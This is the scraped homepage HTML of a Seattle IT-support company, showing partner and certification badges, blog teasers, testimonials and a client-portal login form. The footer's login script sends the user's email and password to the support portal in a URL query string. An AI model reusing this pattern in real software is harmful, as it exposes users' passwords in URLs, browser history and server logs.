<div class="col-md-12 col-sm-12"> <div id="partners-homepage-partners-slider" class="carousel slide partners-carousel " data-ride="carousel" data-wrap="true" data-interval="7000"> <div class="carousel-inner"> <div class="item active"> <div class="row-condensed"> <ul class="list-unstyled grid"> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.microsoft.com/&quot; target=&quot;_blank&quot;&gt;www.microsoft.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;The Microsoft Midmarket Solution Provider competency further demonstrates our commitment and knowledge in providing solutions based on the most current technology and IT-solutions to help midmarket businesses with their unique challenges.&lt;/p&gt;&lt;/p&gt;" data-original-title="Microsoft Silver Partner"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/ms_silver/1227605831.jpg" class="img-rounded img-thumbnail img-responsive" alt="Microsoft Silver Partner"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.microsoft.com/&quot; target=&quot;_blank&quot;&gt;www.microsoft.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;MCITP: Microsoft Certified IT Professional: Server Administrator certifications are designed to validate the skills of Server Administrators, who are recognized among their peers and managers as leaders in the day-to-day operations management.&lt;/p&gt;&lt;/p&gt;" data-original-title="MCITP: Microsoft Certified IT Professional: Server Administrator"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/mcitp/733727927.jpg" class="img-rounded img-thumbnail img-responsive" alt="MCITP: Microsoft Certified IT Professional: Server Administrator"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.cisco.com/&quot; target=&quot;_blank&quot;&gt;www.cisco.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Cisco is the worldwide leader in networking that transforms how people connect, communicate and collaborate. Since the company's inception in 1984, Cisco engineers have been leaders in the development of Internet Protocol (IP)-based networking technologies.&lt;/p&gt;" data-original-title="Cisco Systems"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/cisco/2106808883.jpg" class="img-rounded img-thumbnail img-responsive" alt="Cisco Systems"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.htgpeergroups.com/&quot; target=&quot;_blank&quot;&gt;www.htgpeergroups.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;The HTG peer group experience is a unique forum for technology industry resellers who are serious about implementing a model for success in their own businesses through sharing and collaboration of best practices.&lt;/p&gt;&lt;/p&gt;" data-original-title="HTG – Heartland Technology Group"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/htg-peer-group/2276041066.jpg" class="img-rounded img-thumbnail img-responsive" alt="HTG – Heartland Technology Group"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.hp.com/&quot; target=&quot;_blank&quot;&gt;www.hp.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;HP delivers technologies and services that are right for you. With HP you get reliable technologies, our portfolio of Total Care services and support, a global ecosystem of partners— and complete confidence that HP and its partners will stand behind your business each and every step of the way.&lt;/p&gt;" data-original-title="HP"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/hp_business_partner/107856251.jpg" class="img-rounded img-thumbnail img-responsive" alt="HP"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.washingtontechnology.org/&quot; target=&quot;_blank&quot;&gt;www.washingtontechnology.org&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;600+ member companies with 100,000 tech workers statewide. As one of the oldest and largest statewide technology trade associations in North America, we're passionate about promoting Washington as a desirable place to start and grow successful technology companies amid a strong and connected community.&lt;/p&gt;" data-original-title="WTIA"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/wtia/2042934275.jpg" class="img-rounded img-thumbnail img-responsive" alt="WTIA"></a></li> </ul> </div> </div> <div class="item"> <div class="row-condensed"> <ul class="list-unstyled grid"> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.microsoftbusinesshub.com/&quot; target=&quot;_blank&quot;&gt;www.microsoftbusinesshub.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Microsoft Small Business Specialists are partners who recognize that small-business customers have IT needs and who are able to meet those needs with high-quality solutions built on Microsoft technologies. The solutions are configured according to customer requirements and are supported to ensure customer satisfaction.&lt;/p&gt;" data-original-title="Microsoft Small Business Specialist"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/ms_small_business/4162430191.jpg" class="img-rounded img-thumbnail img-responsive" alt="Microsoft Small Business Specialist"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.lenovo.com/&quot; target=&quot;_blank&quot;&gt;www.lenovo.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Lenovo strives to be a new world company that makes award-winning PCs for our customers. Lenovo develops, manufactures and markets cutting-edge, reliable, high-quality PC products that provide our Business Partners worldwide the smartest ways of being productive and competitive.&lt;/p&gt;" data-original-title="Lenovo"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/lenovo-business-partner/816691020.jpg" class="img-rounded img-thumbnail img-responsive" alt="Lenovo"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.apple.com/&quot; target=&quot;_blank&quot;&gt;www.apple.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;ACSP verifies an understanding of Mac OS X core functionality and an ability to configure key services, perform basic troubleshooting, and support multiple users with essential Mac OS X capabilities. ACSP certification is designed for the help desk professional, technical coordinator or power-user who supports Mac OS X users, manages networks or provides technical support for the Mac in your organization.&lt;/p&gt;" data-original-title="Apple Certified Support Professional"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/apple_support/3741378282.jpg" class="img-rounded img-thumbnail img-responsive" alt="Apple Certified Support Professional"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.symantec.com/index.jsp&quot; target=&quot;_blank&quot;&gt;www.symantec.com/index.jsp&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Symantec is a global leader in infrastructure software, enabling businesses and consumers to have confidence in a connected world. The company helps customers protect their infrastructure, information and interactions by delivering software and services that address risks to security, availability, compliance and performance.&lt;/p&gt;" data-original-title="Symantec"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/Symantec-registered-partner/2991176365.jpg" class="img-rounded img-thumbnail img-responsive" alt="Symantec"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.connectwise.com/&quot; target=&quot;_blank&quot;&gt;www.connectwise.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;ConnectWise is the leading provider of workflow-driven automation for the IT industry, serving thousands of partner clients and thousands of users. Our flagship product, ConnectWise PSA, is an end-to-end, integrated solution that completely meets the needs of IT services companies, IT managed service providers and IT consulting companies.&lt;/p&gt;" data-original-title="ConnectWise"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/ConnectWise/3337980257.jpg" class="img-rounded img-thumbnail img-responsive" alt="ConnectWise"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.appassure.com/&quot; target=&quot;_blank&quot;&gt;www.appassure.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;The world’s fastest and only complete &quot;all-in-one&quot; backup and recovery software solution, Appassure 5 enables local recoveries from any type of failure in just minutes, with the added assurance of offsite application and data backup and recovery from a total site disaster.&lt;/p&gt;" data-original-title="AppAssure 5"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/appassure/1041643600.jpg" class="img-rounded img-thumbnail img-responsive" alt="AppAssure 5"></a></li> </ul> </div> </div> <div class="item"> <div class="row-condensed"> <ul class="list-unstyled grid"> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.mcafee.com/&quot; target=&quot;_blank&quot;&gt;www.mcafee.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;McAfee creates best-of-breed computer security solutions that prevent intrusions on networks and protect computer systems from the next generation of blended attacks and threats. McAfee offers two families of products: McAfee System Protection Solutions, securing desktops and servers; and McAfee Network Protection Solutions, ensuring the protection and performance of the corporate network.&lt;/p&gt;" data-original-title="McAfee"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/mcafee/3264299211.jpg" class="img-rounded img-thumbnail img-responsive" alt="McAfee"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.dell.com/&quot; target=&quot;_blank&quot;&gt;www.dell.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Dell listens to customers and delivers innovative technology and services they trust and value, offering a broad range of product categories, including desktop computer systems, servers and networking products, mobility products, software and peripherals and enhanced services.&lt;/p&gt;" data-original-title="Dell"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/dell/1462676609.jpg" class="img-rounded img-thumbnail img-responsive" alt="Dell"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.efolder.net/&quot; target=&quot;_blank&quot;&gt;www.efolder.net&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;eFolder develops and distributes the best in remote / local backup solutions through its extensive Partner channel. eFolder Partners are VARs, Solution Providers, and Resellers. eFolder backup software empowers eFolder Partners to easily, quickly and profitably enter the remote / local backup services industry.&lt;/p&gt;" data-original-title="eFolder"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/efolder/1633448684.jpg" class="img-rounded img-thumbnail img-responsive" alt="eFolder"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.adhost.com/&quot; target=&quot;_blank&quot;&gt;www.adhost.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Adhost is Seattle's one-stop shop for Web services, offering businesses everything from a fast website to data security, servers that work 24x7 and increased profitability. With customized solutions exclusively for business-class customers, Adhost knows the unique requirements of these organizations and provides Web service and support they can truly count on.&lt;/p&gt;" data-original-title="Adhost"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/adhost/3290435518.jpg" class="img-rounded img-thumbnail img-responsive" alt="Adhost"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.eccouncil.org/&quot; target=&quot;_blank&quot;&gt;www.eccouncil.org&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;The Certified Ethical Hacker certification is the world’s most advanced ethical hacking course with 19 of the most current security domains.&lt;/p&gt;&lt;/p&gt;" data-original-title="Certified Ethical Hacker"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/certified-ethical-hacker/724856420.jpg" class="img-rounded img-thumbnail img-responsive" alt="Certified Ethical Hacker"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.cisco.com/web/learning/certifications/associate/ccna/&quot; target=&quot;_blank&quot;&gt;www.cisco.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;The CCNA R&amp;S certification is recognized as a key route for network professionals on their way to a rewarding career in the Cisco internetworking field.&lt;/p&gt;&lt;/p&gt;" data-original-title="CCNA"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/cisco-certified/2573762672.jpg" class="img-rounded img-thumbnail img-responsive" alt="CCNA"></a></li> </ul> </div> </div> <div class="item"> <div class="row-condensed"> <ul class="list-unstyled grid"> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.dngnet.com/&quot; target=&quot;_blank&quot;&gt;www.dngnet.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;Data Network Group is one of SWAT’s HTG partners located in Boulder, CO. They have been providing IT Support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses since 1997. SWAT Systems and DNG have a special relationship as they allow us to use their secure server space for our BDR data replication.&lt;/p&gt;" data-original-title="Data Network Group"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/data-network-group/651458868.jpg" class="img-rounded img-thumbnail img-responsive" alt="Data Network Group"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;/p&gt;" data-original-title="CompTiA Security"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/Security_Trustmark_logo/644546375.jpg" class="img-rounded img-thumbnail img-responsive" alt="CompTiA Security"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;/p&gt;" data-original-title="CompTiA MSP Partners"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/msp_trustmark200/2132452753.png" class="img-rounded img-thumbnail img-responsive" alt="CompTiA MSP Partners"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://nuleafoffice.com/why-nuleaf&quot; target=&quot;_blank&quot;&gt;www.nuleafoffice.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;NuLeaf Office Solutions, formerly Pacific Northwest Business Products dba The Cartridge Family and Replica Imaging, has been in business over 35 years providing print and office supply products to corporate and government-funded clients.&lt;/p&gt;" data-original-title="NuLeaf Office Solutions"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/Nuleaf/1698387183.jpg" class="img-rounded img-thumbnail img-responsive" alt="NuLeaf Office Solutions"></a></li> <li class="col-xs-6 col-sm-4 col-md-2"><a data-trigger="focus" class="clearfix" role="button" tabindex="0" rel="popover" data-html="true" data-content="&lt;p&gt;&lt;a href=&quot;http://www.wci.com/new/&quot; target=&quot;_blank&quot;&gt;www.wci.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;WCI is an award-winning next-generation voice and data service provider. Since 1995, we have been building custom telecommunications solutions for dynamic emerging and enterprise market leaders requiring seamless and cost-effective business connectivity.&lt;/p&gt;" data-original-title="WCI"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/WCI/1159016344.jpg" class="img-rounded img-thumbnail img-responsive" alt="WCI"></a></li> </ul> </div> </div> </div> </div> <p><script>!function ($) { $(function() {$("#partners-homepage-partners-slider").carousel()})}(window.jQuery)</script></p> <p class="text-center"><a class="btn btn-primary" href="/why-swat-systems/partners-certifications/">See More Partners</a></p> </div> </div> </div> </section> <section class="segment1 hp-highlight-services space-large"> <div class="container"> <div class="row margin-top-20"> <div class="col-md-12 text-center"> <h2 class="font-36"><strong>The Latest From Our Blog</strong></h2> <p class="lead accent2 margin-bottom-40 no-mobile-margin-bottom">Knowledge is power. Grab the latest tips, news, and updates from SWAT Systems.</p> </div> </div> <div class="row"> <div class="row-condensed"> <article class="grid col-md-4 blog-list" itemtype="http://schema.org/BlogPosting" itemscope> <div itemprop="publisher" class="hidden" itemscope="" itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><span itemprop="URL">https://www.swatsystems.com</span></div> <p><span itemprop="name">SWAT Systems</span></div> <figure class="clearfix"><a href="https://www.swatsystems.com/2019/01/11/privacy-vs-security/" class="media-object"><img itemprop="url" alt="Privacy vs Security" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/Tech-dan-privacy/856857900.png" class="img-responsive img-thumbnail margin-l0" width="350" height="200"></a><meta itemprop="image" content="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/12/Tech-dan-privacy.png"></figure> <h3 itemprop="headline"><a href="https://www.swatsystems.com/2019/01/11/privacy-vs-security/"><span itemprop="name">Privacy vs Security</span></a></h3> <p><meta content="2019-01-11" itemprop="datePublished"></p> <div itemprop="articleBody"> <p>Among the questions that I’m regularly asked are those concerning privacy.  The context for these questions leads me to believe people often confuse ...</p> </div> </article> <article class="grid col-md-4 blog-list" itemtype="http://schema.org/BlogPosting" itemscope> <div itemprop="publisher" class="hidden" itemscope="" itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><span itemprop="URL">https://www.swatsystems.com</span></div> <p><span itemprop="name">SWAT Systems</span></div> <figure class="clearfix"><a href="https://www.swatsystems.com/2019/01/11/swat-gives-back/" class="media-object"><img itemprop="url" alt="SWAT Gives Back" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/SWAT-GivesBack/3654376402.png" class="img-responsive img-thumbnail margin-l0" width="350" height="200"></a><meta itemprop="image" content="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/12/SWAT-GivesBack.png"></figure> <h3 itemprop="headline"><a href="https://www.swatsystems.com/2019/01/11/swat-gives-back/"><span itemprop="name">SWAT Gives Back</span></a></h3> <p><meta content="2019-01-11" itemprop="datePublished"></p> <div itemprop="articleBody"> <p>This year, SWAT Systems embraced the giving spirit of the holiday season. We wanted to give back to the communities that we belong to and cherish. With ...</p> </div> </article> <article class="grid col-md-4 blog-list" itemtype="http://schema.org/BlogPosting" itemscope> <div itemprop="publisher" class="hidden" itemscope="" itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><span itemprop="URL">https://www.swatsystems.com</span></div> <p><span itemprop="name">SWAT Systems</span></div> <figure class="clearfix"><a href="https://www.swatsystems.com/2018/12/12/5-ergonomic-tech-gift-ideas/" class="media-object"><img itemprop="url" alt="5 Ergonomic Tech Gift Ideas" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/Tech-Ergonomic-Gifts/3475665237.png" class="img-responsive img-thumbnail margin-l0" width="350" height="200"></a><meta itemprop="image" content="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/12/Tech-Ergonomic-Gifts.png"></figure> <h3 itemprop="headline"><a href="https://www.swatsystems.com/2018/12/12/5-ergonomic-tech-gift-ideas/"><span itemprop="name">5 Ergonomic Tech Gift Ideas</span></a></h3> <p><meta content="2018-12-12" itemprop="datePublished"></p> <div itemprop="articleBody"> <p>With the holidays in full swing, we at SWAT are looking forward to spending quality time with our loved ones and hope you are able to do the same. When ...</p> </div> </article> </div> </div> </div> </section> <section class="segment space-large" style="background-color: #f1853d; background-image: url('https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2014/03/bg_section6.jpg'); background-repeat: no-repeat; background-position: center center; background-attachment: scroll; background-size: cover;"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2 class=" no-mobile-margin-bottom accent4"><strong>Keeping Seattle Happy</strong></h2> <p class="lead accent4 margin-bottom-40 no-mobile-margin-bottom">The latest "love" our awesome clients have shared with us</p> </div> </div> <div class="row"> <div class="col-md-4 margin-bottom-20"> <div class="well testi-effect"> <div itemtype="http://schema.org/Review" itemscope="" class="testimonial"><i class="fa fa-quote-left fa-3x fa-pull-left"></i></p> <div itemprop="reviewBody"> <p>Unbelievable. SWAT called IBM and arranged for them to come to my hotel in Orlando to replace the screen. They did and I was back in business. Couldn't be happier. My best SWAT experience.</p> </div> <p class="text-right"><strong itemprop="author">E. Curtis </strong></p> </div> </div> </div> <div class="col-md-4 margin-bottom-20"> <div class="well testi-effect"> <div itemtype="http://schema.org/Review" itemscope="" class="testimonial"><i class="fa fa-quote-left fa-3x fa-pull-left"></i></p> <div itemprop="reviewBody"> <p>SWAT was very helpful explaining exactly what the problem was and did everything necessary to resolve the issue. They were very patient with me and provided excellent customer service!</p> </div> <p class="text-right"><strong itemprop="author">J. Roberts </strong></p> </div> </div> </div> <div class="col-md-4 margin-bottom-20"> <div class="well testi-effect"> <div itemtype="http://schema.org/Review" itemscope="" class="testimonial"><i class="fa fa-quote-left fa-3x fa-pull-left"></i></p> <div itemprop="reviewBody"> <p>Your team is always able to explain the possibilities without my eyes glazing over with too much technical stuff. I love the fact that you can get onto my laptop and do the investigation for me.</p> </div> <p class="text-right"><strong itemprop="author">C. Gilmore</strong></p> </div> </div> </div> </div> </div> </section> <section class="segment1 hide space-large" style="background-color: #0071BA; background-image: url('https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/06/bg-why-us-services.jpg'); background-repeat: no-repeat; background-position: center top; background-attachment: scroll; background-size: cover;"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2><strong>Follow us on Instagram</strong></h2> <p class="lead accent3 margin-bottom-40 no-mobile-margin-bottom">All of #swatsystems fun, right in your pocket</p> </div> </div> <div class="row"> <!-- LightWidget WIDGET --><script src="//lightwidget.com/widgets/lightwidget.js"></script><iframe src="//lightwidget.com/widgets/92393f6e5fb25269a55feb9410c655ab.html" scrolling="no" allowtransparency="true" class="lightwidget-widget" style="width: 100%; border: 0; overflow: hidden;"></iframe> </div> </div> </section> <!--Footer--> </div><footer id="footer"><div class="segment5 space-medium" ><div class="container"><div class="row margin-top-nav padding-bottom-10"> <div class="col-md-3 xs-text-center no-padding col-xs-12"> <a href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2017/05/SWAT-Logo-White-v1.5.png"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2017/05/SWAT-Logo-White-v1_5/3716661480.png" alt="" width="200" class="alignnone size-medium wp-image-10941" /></a> </div> <div class="col-md-5 no-padding col-sm-3 col-xs-12"> <p class="xs-text-center"> <a href="https://www.facebook.com/SWATSystems" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-facebook fa-inverse fa-stack-1x"></i></span></a> <a href="https://twitter.com/SWATSystems" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-twitter fa-inverse fa-stack-1x"></i></span></a> <a href="https://plus.google.com/113199245502940554361/about?gl=us&#038;hl=en" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-google-plus fa-inverse fa-stack-1x"></i></span></a> <a href="http://www.linkedin.com/company/swat-systems" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-linkedin fa-inverse fa-stack-1x"></i></span></a> <a href="http://www.youtube.com/user/SWATSystems" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-youtube fa-inverse fa-stack-1x"></i></span></a> <a href="http://www.yelp.com/biz/swat-systems-seattle" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-custom-yelp fa-inverse fa-stack-1x"></i></span></a> <a href="http://instagram.com/swatsystems" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-instagram fa-inverse new-instagram fa-stack-1x"></i></span></a> <a href="/feed/" target="_blank"><span class="fa-stack fa-2x"><i class="fa fa-square fa-stack-2x"></i><i class="fa fa-rss fa-inverse fa-stack-1x"></i></span></a> </p> </div> <div class="col-md-3 xs-text-center no-padding col-sm-6 col-xs-12"> <p class="margin-bottom-0 accent4"><strong>Subscribe to our email newsletter</strong></p> <p class="margin-0">Because in IT, keeping up is half the battle</p> <div class="text-center margin-top-20"><div class="createsend-button" style="height:27px;display:inline-block;" data-listid="r/71/D2C/F33/EE9EFC21661D41AB"> </div><script type="text/javascript">(function () { var e = document.createElement('script'); e.type = 'text/javascript'; e.async = true; e.src = ('https:' == document.location.protocol ? 'https' : 'http') + '://btn.createsend1.com/js/sb.min.js?v=3'; e.className = 'createsend-script'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(e, s); })();</script></div> </div> </div> <div class="row hidden-xs"> <div class="col-md-12 no-padding"> <p class="margin-bottom-0">©2019 <a href="/" class="accent5">SWAT Systems.</a> All Rights Reserved.</p> </div> </div> <div class="row visible-xs"> <div class="col-md-12 text-center"> <p style="padding-bottom:15px" class="margin-bottom-0">©2019 <a href="/" class="accent5">SWAT Systems.</a> All Rights Reserved.</p> <div><ul id="menu-privacy-3" class="list-unstyled"><li id="menu-item-6570" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6570"><a href="https://www.swatsystems.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-6569" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6569"><a href="http://www.prontomarketing.com" onclick="__gaTracker('send', 'event', 'outbound-widget', 'http://www.prontomarketing.com', 'Website by Pronto');" target="_blank" rel="nofollow">Website by Pronto</a></li> </ul></div> </div> </div> <!--<script type="text/javascript"> var o = document.getElementById('question'); o.value='Enter remote support code here'; o.setAttribute('onFocus', 'this.value=""'); </script>--> <script type="text/javascript"> function cwLogin() { var strEmail = document.loginform.txtemail.value; var strPassword = document.loginform.txtpass.value; var strEmail = document.loginform.txtemail.value; if (strEmail.length == 0) alert("Please enter your email address."); else if (strPassword.length == 0) alert("Please enter your password."); else location.href = "https://service.swatsystems.com/support/index.htm?gotoparams=&txtemail=" + strEmail + "&txtpass=" + strPassword; } // open the client email with the specified address function sendEmail(encodedEmail) { // do the mailto: link location.href = "mailto:" + decodeEmail(encodedEmail); } // return the decoded email address function decodeEmail(encodedEmail) { // holds the decoded email address var email = ""; // go through and decode the email address for (i=0; i < encodedEmail.length;) { // holds each letter (2 digits) var letter = ""; letter = encodedEmail.charAt(i) + encodedEmail.charAt(i+1) // build the real email address email += String.fromCharCode(parseInt(letter,16)); i += 2; } return email; } function emailPassword() { var strEmail = document.loginform.txtemail.value; if (strEmail.length == 0 || strEmail.indexOf("@") < 0) alert("Please enter your email address and we will email you the password."); else { alert("Please check your mail."); self.location = "https://service.swatsystems.com/support/index.htm?e=" + strEmail; } } function checkEnter(event) { var code = 0; IE4 = (document.all); NS4 = (document.layers); if (NS4) code = event.which; else code = event.keyCode; if (code==13) cwLogin(); } </script> <div class="modal fade" id="loginportal" tabindex="-1" role="dialog"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"><button class="close" type="button" data-dismiss="modal">×</button></div> <div class="modal-body"><h3>Client Portal Login</h3> <div class="client_login_form"><table cellspacing="0" cellpadding="0" border="0" width="400" class="tborder"> <tbody><tr class="contenttableborder"> <td colspan="4"><form method="POST" action="https://service.swatsystems.com/support/index.htm" name="loginform"> <input type="hidden" value="" name="gotoparams"> <table cellspacing="5" cellpadding="2" border="0" width="100%" class="contenttableborder"> <tbody><tr> <td class="smalltext">Email:</td><td> <input type="text" onkeypress="checkEnter(event)" value="" class="logintext form-control" name="txtemail"> </td></tr><tr> <td class="smalltext">Password:</td> <td> <input type="password" onkeypress="checkEnter(event)" value="" class="loginpassword form-control" name="txtpass"></td> <td></td></tr><tr><td> <input type="button" onkeypress="checkEnter(event)" 